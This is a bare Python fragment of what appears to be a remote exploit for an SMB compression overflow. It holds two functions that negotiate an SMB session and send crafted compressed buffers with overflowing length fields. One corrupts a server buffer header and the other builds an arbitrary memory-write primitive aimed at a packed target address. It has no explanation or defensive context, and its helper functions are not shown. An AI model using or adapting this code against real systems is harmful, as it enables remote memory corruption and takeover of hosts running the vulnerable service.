def write_srvnet_buffer_hdr(ip, port, data, offset): sock = reconnect(ip, port) smb_negotiate(sock) sock.recv(1000) compressed_data = compress_evil(data) dummy_data = b"\x33" * (overflow_val + offset) smb_compress(sock, compressed_data, 0xFFFFEFFF, dummy_data) sock.close()
def write_primitive(ip, port, data, addr): sock = reconnect(ip, port) smb_negotiate(sock) sock.recv(1000) uncompressed_data = b"\x41" * (overflow_val - len(data)) uncompressed_data += b"\x00" * PNET_RAW_BUFF_OFFSET uncompressed_data += struct.pack('<Q', addr) compressed_data = compress(uncompressed_data) smb_compress(sock, compressed_data, 0xFFFFFFFF, data) sock.close()